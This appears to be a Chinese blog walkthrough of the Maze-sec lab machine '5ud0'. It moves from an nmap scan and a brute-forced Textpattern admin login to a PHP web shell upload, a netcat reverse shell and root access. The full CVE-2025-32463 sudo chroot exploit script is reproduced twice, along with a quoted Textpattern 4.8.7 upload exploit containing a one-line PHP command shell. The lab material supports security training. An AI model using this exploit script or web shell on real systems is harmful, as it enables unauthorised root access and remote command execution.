5ud0

靶机说明

QQ群:660930334

一、主机探测

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
┌──(root㉿kali)-[/miao/maze-sec/5ud0]
└─# nmap -sn 192.168.2.0/24              
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-07-15 15:41 CST
Nmap scan report for 192.168.2.1
Host is up (0.00043s latency).
MAC Address: 0A:00:27:00:00:0A (Unknown)
Nmap scan report for 192.168.2.2
Host is up (0.00079s latency).
MAC Address: 08:00:27:0E:81:B3 (Oracle VirtualBox virtual NIC)
Nmap scan report for 192.168.2.58
Host is up (0.00071s latency).
MAC Address: 08:00:27:23:05:B0 (Oracle VirtualBox virtual NIC)
Nmap scan report for 192.168.2.4
Host is up.
Nmap done: 256 IP addresses (4 hosts up) scanned in 2.06 seconds

靶机IP:192.168.2.58

二、端口扫描

1、全端口扫描

1
2
3
4
5
6
7
8
9
10
11
12
┌──(root㉿kali)-[/miao/maze-sec/5ud0]
└─# nmap --min-rate 10000 -p- 192.168.2.58                   
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-07-15 15:42 CST
Nmap scan report for 192.168.2.58
Host is up (0.00085s latency).
Not shown: 65533 closed tcp ports (reset)
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http
MAC Address: 08:00:27:23:05:B0 (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 5.79 seconds

开放端口22,80

2、详细信息扫描

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
┌──(root㉿kali)-[/miao/maze-sec/5ud0]
└─# nmap --min-rate 10000 -sT -sV -sC -O -p22,80 192.168.2.58
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-07-15 15:43 CST
Nmap scan report for 192.168.2.58
Host is up (0.00064s latency).

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 10.0p2 Debian 5 (protocol 2.0)
80/tcp open  http    Apache httpd 2.4.62 ((Debian))
|_http-title: My site
|_http-server-header: Apache/2.4.62 (Debian)
|_http-generator: Textpattern CMS
MAC Address: 08:00:27:23:05:B0 (Oracle VirtualBox virtual NIC)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.8
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 9.44 seconds

系统框架Textpattern CMS 4.8.7

3、UDP端口扫描

1
2
3
4
5
6
7
8
9
10
┌──(root㉿kali)-[/miao/maze-sec/5ud0]
└─# nmap -sU --top-ports 100 192.168.2.58                    
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-07-15 15:43 CST
Nmap scan report for 192.168.2.58
Host is up (0.00057s latency).
All 100 scanned ports on 192.168.2.58 are in ignored states.
Not shown: 61 closed udp ports (port-unreach), 39 open|filtered udp ports (no-response)
MAC Address: 08:00:27:23:05:B0 (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 57.68 seconds

没有开放的端口

三、WEB渗透

访问80端口,找到一个域名textpattern.dsz,追加至hosts文件

找到一个登录框

1、密码爆破

尝试进行密码爆破,成功找到用户名和密码admin:superman

2、文件上传

找到上传文件点,上传shell,获得文件上传后的路径/files/rev.php

3、获取www-data权限

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
┌──(root㉿kali)-[/miao/maze-sec/5ud0]
└─# nc -lvnp 4444     
listening on [any] 4444 ...
connect to [192.168.2.4] from (UNKNOWN) [192.168.2.58] 44504
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/usr/bin/script -qc /bin/bash /dev/null
www-data@5ud0:/var/www/html/files$ ^Z 
zsh: suspended  nc -lvnp 4444
                                                                                                                                               
┌──(root㉿kali)-[/miao/maze-sec/5ud0]
└─# stty raw -echo;fg
[1]  + continued  nc -lvnp 4444
                               reset
reset: unknown terminal type unknown
Terminal type? xterm
www-data@5ud0:/var/www/html/files$ uid=33(www-data) gid=33(www-data) groups=33(www-data)

USER FLAG

1
2
www-data@5ud0:/home/todd$ cat user.txt 
flag{user-80e68759-1ca0-45eb-82a7-601b1f78dfe5}

四、权限提升

CVE-2025-32463-sudo提权

查看具有suid权限的文件,发现存在两个sudo

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
www-data@5ud0:/var/www/html/files$ find / -perm -u=s -type f 2>/dev/null
/usr/bin/chsh
/usr/bin/chfn
/usr/bin/newgrp
/usr/bin/gpasswd
/usr/bin/mount
/usr/bin/su
/usr/bin/umount
/usr/bin/pkexec
/usr/bin/sudo
/usr/bin/passwd
/usr/local/bin/sudo
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/eject/dmcrypt-get-device
/usr/lib/openssh/ssh-keysign
/usr/libexec/polkit-agent-helper-1

查看当前系统使用的哪个sudo

1
2
www-data@5ud0:/var/www/html/files$ which sudo
/usr/local/bin/sudo

查看sudo的版本

1
2
3
4
5
6
www-data@5ud0:/var/www/html/files$ /usr/local/bin/sudo -V
Sudo version 1.9.6
Sudoers policy plugin version 1.9.6
Sudoers file grammar version 48
Sudoers I/O plugin version 1.9.6
Sudoers audit plugin version 1.9.6
1
2
3
4
5
6
www-data@5ud0:/var/www/html/files$ /usr/bin/sudo -V      
Sudo version 1.9.16p2
Sudoers policy plugin version 1.9.16p2
Sudoers file grammar version 50
Sudoers I/O plugin version 1.9.16p2
Sudoers audit plugin version 1.9.16p2

发现/usr/bin/sudo的版本,符合CVE-2025-32463的影响范围

验证漏洞,存在

1
www-data@5ud0:/var/www/html/files$ /usr/bin/sudo -R woot woot sudo: woot: No such file or directory

使用exp进行提权

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
#!/bin/bash
# sudo-chwoot.sh
# CVE-2025-32463 – Sudo EoP Exploit PoC by Rich Mirch
#                  @ Stratascale Cyber Research Unit (CRU)
STAGE=$(mktemp -d /tmp/sudowoot.stage.XXXXXX)
cd ${STAGE?} || exit 1

if [ $# -eq 0 ]; then
    # If no command is provided, default to an interactive root shell.
    CMD="/bin/bash"
else
    # Otherwise, use the provided arguments as the command to execute.
    CMD="$@"
fi

# Escape the command to safely include it in a C string literal.
# This handles backslashes and double quotes.
CMD_C_ESCAPED=$(printf '%s' "$CMD" | sed -e 's/\\/\\\\/g' -e 's/"/\\"/g')

cat > woot1337.c<<EOF
#include <stdlib.h>
#include <unistd.h>

__attribute__((constructor)) void woot(void) {
  setreuid(0,0);
  setregid(0,0);
  chdir("/");
  execl("/bin/sh", "sh", "-c", "${CMD_C_ESCAPED}", NULL);
}
EOF

mkdir -p woot/etc libnss_
echo "passwd: /woot1337" > woot/etc/nsswitch.conf
cp /etc/group woot/etc
gcc -shared -fPIC -Wl,-init,woot -o libnss_/woot1337.so.2 woot1337.c

echo "woot!"
sudo -R woot woot  //需要修改存在漏洞的sudo
rm -rf ${STAGE?}

获取ROOT权限

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
www-data@5ud0:/var/www/html/files$ chmod +x sudo-chwoot.sh 
www-data@5ud0:/var/www/html/files$ ./sudo-chwoot.sh 
woot!

We trust you have received the usual lecture from the local System
Administrator. It usually boils down to these three things:

    #1) Respect the privacy of others.
    #2) Think before you type.
    #3) With great power comes great responsibility.

For security reasons, the password you type will not be visible.

[sudo] password for www-data:   //随意输入密码
root@5ud0:/# id
uid=0(root) gid=0(root) groups=0(root),33(www-data)
root@5ud0:/#

ROOT FLAG

1
2
root@5ud0:/root# cat root.txt 
flag{root-257f425d-1ea4-4b8e-8dd8-69523f25d249}

【总结】

1、Textpattern CMS 4.8.7文件上传

exp

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
# Exploit Title : TextPattern CMS 4.8.7 - Remote Command Execution (Authenticated)
# Date : 2021/09/06
# Exploit Author : Mert Daş merterpreter@gmail.com
# Software Link : https://textpattern.com/file_download/113/textpattern-4.8.7.zip
# Software web : https://textpattern.com/
# Tested on: Server : Xampp

First of all we should use file upload section to upload our shell.
Our shell contains this malicious code: <?PHP system($_GET['cmd']);?>

1) Go to content section .
2) Click Files and upload malicious php file.
3) go to yourserver/textpattern/files/yourphp.php?cmd=yourcode;

After upload our file , our request and respons is like below :

Request:

GET /textpattern/files/cmd.php?cmd=whoami HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:89.0)
Gecko/20100101 Firefox/89.0
Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Connection: close
Cookie: txp_login_public=18e9bf4a21admin; language=en-gb; currency=GBP;
PHPSESSID=cctbu6sj8571j2t6vp7g8ab7gi
Upgrade-Insecure-Requests: 1


Response:

HTTP/1.1 200 OK
Date: Thu, 10 Jun 2021 00:32:41 GMT
Server: Apache/2.4.48 (Win64) OpenSSL/1.1.1k PHP/7.4.20
X-Powered-By: PHP/7.4.20
Content-Length: 22
Connection: close
Content-Type: text/html; charset=UTF-8

pc\mertdas

2、CVE-2025-32463-sudo提权

漏洞允许本地攻击者通过 -R ( –chroot ) 选项诱骗 Sudo 使用用户指定的根目录加载任意共享库,从而提升权限。攻击者可以在支持 /etc/nsswitch.conf 的系统上以 root 身份运行任意命令,进而控制系统(安装恶意软件、窃取数据、破坏系统完整性)。

指标 CVE-2025-32463 CVE-2025-32462
CVSS 3.1评分 9.3(严重) 7.0(中危)
攻击复杂度 低(默认配置) 中(非默认配置)
核心风险 本地用户 -> root 提权

chroot 路径隔离失效导致加载恶意 NSS 库		 绕过 Sudo 规则限制

符号链接解析漏洞导致执行未授权命令
影响范围 Sudo 1.9.14 – 1.9.17 Sudo 1.9.15 – 1.9.16

EXP

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
#!/bin/bash
# sudo-chwoot.sh
# CVE-2025-32463 – Sudo EoP Exploit PoC by Rich Mirch
#                  @ Stratascale Cyber Research Unit (CRU)
STAGE=$(mktemp -d /tmp/sudowoot.stage.XXXXXX)
cd ${STAGE?} || exit 1

if [ $# -eq 0 ]; then
    # If no command is provided, default to an interactive root shell.
    CMD="/bin/bash"
else
    # Otherwise, use the provided arguments as the command to execute.
    CMD="$@"
fi

# Escape the command to safely include it in a C string literal.
# This handles backslashes and double quotes.
CMD_C_ESCAPED=$(printf '%s' "$CMD" | sed -e 's/\\/\\\\/g' -e 's/"/\\"/g')

cat > woot1337.c<<EOF
#include <stdlib.h>
#include <unistd.h>

__attribute__((constructor)) void woot(void) {
  setreuid(0,0);
  setregid(0,0);
  chdir("/");
  execl("/bin/sh", "sh", "-c", "${CMD_C_ESCAPED}", NULL);
}
EOF

mkdir -p woot/etc libnss_
echo "passwd: /woot1337" > woot/etc/nsswitch.conf
cp /etc/group woot/etc
gcc -shared -fPIC -Wl,-init,woot -o libnss_/woot1337.so.2 woot1337.c

echo "woot!"
sudo -R woot woot  //注意路径
rm -rf ${STAGE?}
Maze-sec
#Textpattern CMS #文件上传 #CVE-2025-32463
5ud0
http://miao-sec.github.io/Maze-sec/5ud0/
作者
Miao
发布于
2025年7月16日
许可协议
BY-MIAO